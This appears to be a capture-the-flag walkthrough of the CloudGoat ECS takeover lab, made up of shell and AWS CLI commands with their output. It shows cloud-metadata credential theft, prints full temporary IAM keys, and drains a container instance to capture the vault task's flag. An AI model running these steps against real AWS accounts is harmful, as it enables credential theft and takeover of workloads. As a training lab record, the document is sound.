ecs_takeover

# Deploy
% ./cloudgoat.py create scenarios/ecs_takeover
% cat /home/hnl/Desktop/ctf/cloud-goat/cloudgoat/ecs_takeover_cgidzfcze74guw/start.txt
Start-Note = If a 503 error is returned by the ALB give a few mins for the website container to become active.
vuln-site = ec2-54-167-55-4.compute-1.amazonaws.com

# Start
; docker ps
CONTAINER ID   IMAGE                                    COMMAND        CREATED              STATUS                        PORTS     NAMES
4a19b685989b   cloudgoat/ecs-takeover-vulnsite:latest   ./main       About a minute ago   Up About a minute                       ecs-cg-ecs-takeover-ecs_takeover_cgidzfcze74guw-vulnsite-1-vulnsite-e8c7989499bab5979101
e01ee1a603a5   busybox:latest                           sleep 365d   About a minute ago   Up About a minute                       ecs-cg-ecs-takeover-ecs_takeover_cgidzfcze74guw-privd-1-privd-b0adcfcec3f5bba26100
9a875816669a   amazon/amazon-ecs-agent:latest           /agent       About a minute ago   Up About a minute (healthy)             ecs-agent


; docker exec e01ee1a603a5 sh -c 'wget -O- 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI'
; docker exec e01ee1a603a5 sh -c 'wget -O- 169.254.169.254/latest/meta-data/iam/security-credentials/'
; docker exec e01ee1a603a5 sh -c 'wget -O- 169.254.169.254/latest/meta-data/iam/security-credentials/cg-ecs-takeover-ecs_takeover_cgidzfcze74guw-ecs-agent'
{
  "RoleArn": "arn:aws:iam::287336331436:role/cg-ecs-takeover-ecs_takeover_cgidzfcze74guw-privd",
  "AccessKeyId": "ASIAUFZUUPCWAHLUJMV7",
  "SecretAccessKey": "VTKWomXS3IfkOO06aD/SKIHmYnvvR6dxTJHgKEjz",
  "Token": "IQoJb3JpZ2luX2VjEIf//////////wEaCXVzLWVhc3QtMSJHMEUCIQD8qlG6rnd/XsZ3JNkM5W5SuCLFqig+TNOJU2Qz3ZcxkgIgXLLpMkvbn46hMuqrEGkiVOeYkvWxS+nF9K7qooglKlEqwAQIz///////////ARACGgwyODczMzYzMzE0MzYiDJqdo1Q7bk5zYKxVuSqUBDkZJSeUq6tKuFBu78cToWucoUmBJca8amb28xJTQ5K1bB1sGeSAepKk48gw0yKMuEzW1+OhOeGx5hLIeRX2v83wtmy7L7kFklxSRAid6eqQP1LRSetsMcpZ5RDS+gaBiGNGlOi5Le/lQCx6tJicXiVEOiYUa5z225J3XwYyslyOoV5nntQuuIbo0yQHUu1YomFM22GI5zIR+Tf99Ez7Lbftg2olbvPuA0mXQGu9i+/r+MRhdeIlU1IB23eB4wH07/borTipaSyYQSmlMXxhheOOjkXhJLIfxhR8iiyMA7qgvRPsiLyT1eVp3ivoJJDRJi7AaQ4C1A65Kf0ls6Pprng0C45f7oyFgK+nrzFF/oAhQkY4TooaiTGxWYpZwZVLENyXADvI0+jrmLJ3syC/oKTD/gciro4MAW0hFwLATeEa99GNBGyM50biWPJTNwMxi6L62YE5YMtWG/b7lxd+hbWrU32Uc46QvFIIiihlQ7kvqfjfOK/XdrMd7hthJ/K5EykjqjoDbF92xtgcfAkF8B0RMtpjVgquufdAR4hnt2CkCUvRl+/Ap9gmHqpreOiVbBFUfF85hX7hvsHXLzDoDMnf8UCWA5+TXz51xn766DHdGphvFMqhMRoP3BENgpNH6rJQwivCQ2/KX46eBKGur73Afgkaknnvq+8pakvL+1tuRIeUcGy93nKYxxLp2z7U1MMDrs0wt+/riQY6pgGbQ9bIHKlcbJ8G1JQWzLeskbBkwMkY5ClIWDOOI12zXR+eVBJROJGjQr7jPVfalE1DGzLyHdYQneO+fqBdznnd7JTkG6aH1weh54NdMQrpjXDZrwHPaVEADkN2w4jWBeZZkqnmw5XigpYnt147Ds8YgaO04iWemKdryS+f2EIispLUvqRmbK2mwCwlxxfcumCsAgbBFlnETJa2SmtXPLFK0PqqAwaT",
  "Expiration": "2021-09-10T12:14:15Z"
}

# List Cluster
# aws --profile <container_credentials> ecs list-clusters
% aws --profile ecs-user --region us-east-1 ecs list-clusters
{
    "clusterArns": [
        "arn:aws:ecs:us-east-1:287336331436:cluster/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster"
    ]
}

# View task
# aws --profile <container_credentials> ecs list-tasks --cluster <your_cluster_name> --query taskArns --out text
% aws --profile ecs-user --region us-east-1 ecs list-tasks --cluster ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster --query taskArns --out text > text.txt
arn:aws:ecs:us-east-1:287336331436:task/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster/8d313d075fc44dbb87881533c0dc9ea9   
arn:aws:ecs:us-east-1:287336331436:task/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster/8fc95bf535f54e62b296424b84b8965b   
arn:aws:ecs:us-east-1:287336331436:task/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster/bee7d36a3b0745c9874dbbbdb41f5c93   
arn:aws:ecs:us-east-1:287336331436:task/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster/f41f196024ed4fac912f9be1b99f257a

# the following command will describe the target task which will include the name of the corresponding service:
# aws --profile <container_credentials> ecs describe-tasks --cluster <your_cluster_name> --tasks <target_task>
# you will have listed out all of the tasks and their corresponding ecs instances (which are the ec2 instances that tasks, and therefore docker containers, are running on).
% aws --profile ecs-user --region us-east-1 ecs describe-tasks --cluster ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster --tasks arn:aws:ecs:us-east-1:287336331436:task/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster/8fc95bf535f54e62b296424b84b8965b
{
    "tasks": [
        {
            "attachments": [],
            "availabilityZone": "us-east-1a",
            "clusterArn": "arn:aws:ecs:us-east-1:287336331436:cluster/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster",
            "connectivity": "CONNECTED",
            "connectivityAt": 1631254457.317,
            "containerInstanceArn": "arn:aws:ecs:us-east-1:287336331436:container-instance/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster/417bbe270df2497fab3fd0f082c935c2",
            "containers": [
                {
                    "containerArn": "arn:aws:ecs:us-east-1:287336331436:container/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster/8fc95bf535f54e62b296424b84b8965b/f4a5b870-83ec-4f9d-91dc-a52f4fc0c0dc",
                    "taskArn": "arn:aws:ecs:us-east-1:287336331436:task/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster/8fc95bf535f54e62b296424b84b8965b",
                    "name": "vault",
                    "image": "busybox:latest",
                    "runtimeId": "3cff558940396ab8323eb5102cf1236724103837e8d731e031da3e4516e0d2b7",
                    "lastStatus": "RUNNING",
                    "networkBindings": [],
                    "networkInterfaces": [],
                    "healthStatus": "UNKNOWN",
                    "cpu": "50",
                    "memory": "50"
                }
            ],
            "cpu": "50",
            "createdAt": 1631254457.317,
            "desiredStatus": "RUNNING",
            "enableExecuteCommand": false,
            "group": "service:vault",
            "healthStatus": "UNKNOWN",
            "lastStatus": "RUNNING",
            "launchType": "EC2",
            "memory": "50",
            "overrides": {
                "containerOverrides": [
                    {
                        "name": "vault"
                    }
                ],
                "inferenceAcceleratorOverrides": []
            },
            "pullStartedAt": 1631254459.614,
            "pullStoppedAt": 1631254459.86,
            "startedAt": 1631254459.743,
            "startedBy": "ecs-svc/0436864570798496396",
            "tags": [],
            "taskArn": "arn:aws:ecs:us-east-1:287336331436:task/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster/8fc95bf535f54e62b296424b84b8965b",
            "taskDefinitionArn": "arn:aws:ecs:us-east-1:287336331436:task-definition/cg-ecs-takeover-ecs_takeover_cgidzfcze74guw-vault:1",
            "version": 2
        }
    ],
    "failures": []
}

# aws --profile <host_credentials> ecs update-container-instances-state --cluster <your_cluster_name> --container-instances <target_container_instance> --status DRAINING
% aws --profile cloudgoat --region us-east-1 ecs update-container-instances-state --cluster ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster --container-instances ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster/417bbe270df2497fab3fd0f082c935c2 --status DRAINING

; docker exec 4807002ef95d ls
; docker exec 4807002ef95d cat FLAG.TXT
Previousiam_privesc_by_rollbackNextRedTeam Writeups

Last updated

Was this helpful?